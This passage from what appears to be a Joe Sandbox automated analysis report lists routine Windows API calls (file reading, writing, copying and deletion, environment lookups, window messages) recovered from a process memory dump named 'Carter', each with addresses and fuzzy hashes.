                                                                            • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00283CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00284276
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1bcd8f17a24c75f6e5d5e83f04a31e40471454c14b32bd87f8d595f7b40b5e9b
                                                                            • Instruction ID: 3904609d9bd2e05e512f46d7b4ed6b32190019c45e22d8c29e55984325794dbf
                                                                            • Opcode Fuzzy Hash: 1bcd8f17a24c75f6e5d5e83f04a31e40471454c14b32bd87f8d595f7b40b5e9b
                                                                            • Instruction Fuzzy Hash: A1118F392197029FD330EF55C480B62B7F8EF44710F14C91EE8AA86694D7B0F854CB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                            • Instruction ID: 5011f36270a59557a8d7a9f621a0899845dcf1eab615142909aec14cfa8203ce
                                                                            • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                            • Instruction Fuzzy Hash: D601D6722217066ED7246F38DC02B67BB98DB447A0F10852AF92ACA1D1EA71E570CB90
                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 002E4998
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentVariable
                                                                            • String ID:
                                                                            • API String ID: 1431749950-0
                                                                            • Opcode ID: 6e4e6552f804fb6c2128da4ce0674c01f467e5b0de7230e19afc5fa70f2b77be
                                                                            • Instruction ID: ccd91ff9ee5b5585cf6fb47ccd631374aa5adf07e0d5d0b1cb58119531cbd38d
                                                                            • Opcode Fuzzy Hash: 6e4e6552f804fb6c2128da4ce0674c01f467e5b0de7230e19afc5fa70f2b77be
                                                                            • Instruction Fuzzy Hash: E7F04435618109AFCB14FF65D846C9F77BCEF45720B004056F8089B251DE71BD61CB50
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • _memset.LIBCMT ref: 002D7CB4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 525207782-0
                                                                            • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                            • Instruction ID: bd91e58cf7d663b8ba81ca67ad2cb97737d862cbcd66cdea8fa9f590025b844e
                                                                            • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                            • Instruction Fuzzy Hash: 5A01F6742182049FD721EF5CD541F45BBE1AF59710F24C45AF5888B392DB72E920CF91
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • _memmove.LIBCMT ref: 002ADC8B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1602317333-0
                                                                            • Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                            • Instruction ID: 3a0741d6cc793468e4f3cfed6dcba90a1ee31422be5433deb0167ed4d6832827
                                                                            • Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                            • Instruction Fuzzy Hash: 8EF01D74614102DFDB11DF68C981E15BBE1BF1A710B24849CE58D8B3A2EB73E921CF91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _fseek
                                                                            • String ID:
                                                                            • API String ID: 2937370855-0
                                                                            • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                            • Instruction ID: a01285ea70db922baef0217c24fd1bb2bbb5016df2c694ebd8a6d3f9d89534ae
                                                                            • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                            • Instruction Fuzzy Hash: 59F085BA510208FFDF159F84DC00DEBBBB9EB89720F00419CF9045A210D272EA218BA0
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,002827AF,?,00000001), ref: 00284A63
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: b4dda8de6e5f77235d07f0977d959be1c578a88ffbc74f31bad1eeb27e709010
                                                                            • Instruction ID: 402f66aacbbb912e4e48cb7e64dcf98133b1ee45565d3f5df911aa3d84643746
                                                                            • Opcode Fuzzy Hash: b4dda8de6e5f77235d07f0977d959be1c578a88ffbc74f31bad1eeb27e709010
                                                                            • Instruction Fuzzy Hash: 6BF08579162703CFCB38BF64E4A0816BBF0AF14325320892EE5D78B651C73299A0CF44
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                            • Instruction ID: 0f54bdf2af798fb2ec90c78f8bd344de01c283e793cd42f70e01f0d5c380ee66
                                                                            • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                            • Instruction Fuzzy Hash: 21F0587241020DFFDF05DF90C941EAABB79FF04314F208189F8188A212D332EA21AB90
                                                                            APIs
                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002909E4
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_memmove
                                                                            • String ID:
                                                                            • API String ID: 2514874351-0
                                                                            • Opcode ID: 4eeb18644d5f13934f7d444ee887c447e6effb0ba1e23c0159068f8f2728e3d3
                                                                            • Instruction ID: 076cdfec999b4ac432c8bf0f9fe7385b64ac27607c7fb6ce1feaddf0e7dacd86
                                                                            • Opcode Fuzzy Hash: 4eeb18644d5f13934f7d444ee887c447e6effb0ba1e23c0159068f8f2728e3d3
                                                                            • Instruction Fuzzy Hash: 88E0863691112857C721A6989C16FEA77DDDF897A0F0401B6FC08D7244D9609CA18A91
                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002D4D31
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FolderPath_memmove
                                                                            • String ID:
                                                                            • API String ID: 3334745507-0
                                                                            • Opcode ID: fa94f4744c0b87cccc470c3655d2bc637ae6a38c6ca10d145c4066692f16db8b
                                                                            • Instruction ID: 6701b5999edf348c4b505649f7b59f0ddb4850d88e9db784abe81e25932a746d
                                                                            • Opcode Fuzzy Hash: fa94f4744c0b87cccc470c3655d2bc637ae6a38c6ca10d145c4066692f16db8b
                                                                            • Instruction Fuzzy Hash: 19D05EA591132C2BEB64E6A59C0EDB77BACD744220F0006A27C5CC3141E9249D558AE0
APIs
  • Part of subcall function 002D384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,002D3959,00000000,00000000,?,002C05DB,00328070,00000002,?,?), ref: 002D38CA
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,002C05DB,00328070,00000002,?,?,?,00000000), ref: 002D3967
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: c7de2b3bcad887645ce4386c16bce9d3249d409f0095d0860e19e9082ace3705
• Instruction ID: 438fff65b77d9b39b6464c45ef5f69732fc1a339008563f87be5d087b661383d
• Opcode Fuzzy Hash: c7de2b3bcad887645ce4386c16bce9d3249d409f0095d0860e19e9082ace3705
• Instruction Fuzzy Hash: D5E04636410208BBDB20EF94D801B9ABBBDEB04320F00465BFD4092111DBB2AE24ABE1
APIs
• CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002D3E7D,?,?,?), ref: 002D3F0D
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 62990fa24c3af6b906b1c1c2f3f10d0353c2d169d5ddce4a3ae94f07cdbbde12
• Instruction ID: 851e32f01f6c3f09ec540fe29ae9abf933b4b7ddd820303364a127fdc14c1ffd
• Opcode Fuzzy Hash: 62990fa24c3af6b906b1c1c2f3f10d0353c2d169d5ddce4a3ae94f07cdbbde12
• Instruction Fuzzy Hash: A7D0A7315E020CBBEF50DFA4CC06FA8B7ACE711706F1002A4B504D90E0DA7269149795
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,002C06E6,00000000,00000000,00000000), ref: 002842BF
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 24dc1951faae010bc44230bbff664216403b45301ff2da6cb13277f27f241087
• Instruction ID: 67b759117ae5bdbb7e6afc2cc92f02f79f4cfbd6677ac11849d47373c46fc05b
• Opcode Fuzzy Hash: 24dc1951faae010bc44230bbff664216403b45301ff2da6cb13277f27f241087
• Instruction Fuzzy Hash: E8D0C77464020CBFE715CB80DC46FA9777CE705710F100195FD0466290D6B27D508795
APIs
• GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: db41984d1112e6224b38485f13c8b3008429450a5bd541209d1ad946495edf0f
• Instruction ID: 66fdc1fe424748780512325c1ad671e3170fa1e622794de4bf6429c5b4f3ab3c
• Opcode Fuzzy Hash: db41984d1112e6224b38485f13c8b3008429450a5bd541209d1ad946495edf0f
• Instruction Fuzzy Hash: 4FB092380216025B9D2C2F3C19581A9330558423A9BD81B83E47885AF296398C6FA520
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: 6ca23f9bb5531627f2d88530d72eb08d11746b1c5a8fb1346a784bd25b1a399a
• Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction Fuzzy Hash: 3DB0927654020C77CE022E82EC03A593B29AB40A68F408020FB0C1C162A673A6B09A89
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 002DD842
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 9a146891951c729c9dfcc814090b2e7b540ff9aa43a2f9bb4ab8f8cd0409eedf
• Instruction ID: 9e002c5fc2f6877532301edcc58e6fc9f8cadc43e02fcdc577aee532aa0569c5
• Opcode Fuzzy Hash: 9a146891951c729c9dfcc814090b2e7b540ff9aa43a2f9bb4ab8f8cd0409eedf
• Instruction Fuzzy Hash: 5A7162342257028FC714EF64D491A6AB7E4AF88354F04466EF8969B3E2DB30ED25CF52
APIs
  • Part of subcall function 002D4005: FindFirstFileW.KERNEL32(?,?), ref: 002D407C
  • Part of subcall function 002D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 002D40CC
  • Part of subcall function 002D4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D40DD
  • Part of subcall function 002D4005: FindClose.KERNEL32(00000000), ref: 002D40F4
• GetLastError.KERNEL32 ref: 002DC292
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
• Opcode ID: c3588b6fd9dae52239412c987fb08edec8b1bea954fba45356491367715c03df
• Instruction ID: f95f0b608857cd46e318cf79841fd91b1d0a316cf266da0943dfd1bc44b7733d
• Opcode Fuzzy Hash: c3588b6fd9dae52239412c987fb08edec8b1bea954fba45356491367715c03df
• Instruction Fuzzy Hash: D5F082352202108FCB15FF59D854B5AB7E5AF44320F05C05AF94997351CB70BC11CF94
APIs
• CloseHandle.KERNEL32(?,?,00000000,002B2F8B), ref: 002842EF
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 5f0b9ed91cf0bc4101d51549197d510ddc16adfa50801090ef8a7f3f8645bbad
• Instruction ID: d2ca10955e315e997bd3ba784e5f4e54887f71aa816d98971bebef4d80183078
• Opcode Fuzzy Hash: 5f0b9ed91cf0bc4101d51549197d510ddc16adfa50801090ef8a7f3f8645bbad
• Instruction Fuzzy Hash: 9AE09A79415702CFC3326F1AD404411F7E4FFD13613214A2FE4E6925A4D7B054958B50
APIs
  • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002FD208
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002FD249
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002FD28E
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002FD2B8
• SendMessageW.USER32 ref: 002FD2E1
• _wcsncpy.LIBCMT ref: 002FD359
• GetKeyState.USER32(00000011), ref: 002FD37A
• GetKeyState.USER32(00000009), ref: 002FD387
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002FD39D
• GetKeyState.USER32(00000010), ref: 002FD3A7
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002FD3D0
• SendMessageW.USER32 ref: 002FD3F7
• SendMessageW.USER32(?,00001030,?,002FB9BA), ref: 002FD4FD
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002FD513
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002FD526
• SetCapture.USER32(?), ref: 002FD52F
• ClientToScreen.USER32(?,?), ref: 002FD594
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002FD5A1
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002FD5BB
• ReleaseCapture.USER32 ref: 002FD5C6
• GetCursorPos.USER32(?), ref: 002FD600
• ScreenToClient.USER32(?,?), ref: 002FD60D
• SendMessageW.USER32(?,00001012,00000000,?), ref: 002FD669
• SendMessageW.USER32 ref: 002FD697
• SendMessageW.USER32(?,00001111,00000000,?), ref: 002FD6D4
• SendMessageW.USER32 ref: 002FD703
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002FD724
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 002FD733
• GetCursorPos.USER32(?), ref: 002FD753
• ScreenToClient.USER32(?,?), ref: 002FD760
• GetParent.USER32(?), ref: 002FD780
• SendMessageW.USER32(?,00001012,00000000,?), ref: 002FD7E9
• SendMessageW.USER32 ref: 002FD81A
• ClientToScreen.USER32(?,?), ref: 002FD878
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002FD8A8
• SendMessageW.USER32(?,00001111,00000000,?), ref: 002FD8D2
• SendMessageW.USER32 ref: 002FD8F5
• ClientToScreen.USER32(?,?), ref: 002FD947
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002FD97B
  • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
• GetWindowLongW.USER32(?,000000F0), ref: 002FDA17
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
